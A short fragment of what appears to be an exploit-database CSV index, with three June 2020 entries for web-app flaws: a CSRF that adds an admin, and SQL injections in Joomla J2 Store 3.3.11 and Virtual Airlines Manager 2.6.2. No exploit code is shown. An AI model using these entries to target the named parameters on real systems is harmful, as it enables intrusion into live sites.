48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php,
|
||||
48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php,
|
||||
48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php,
|
||||
|
|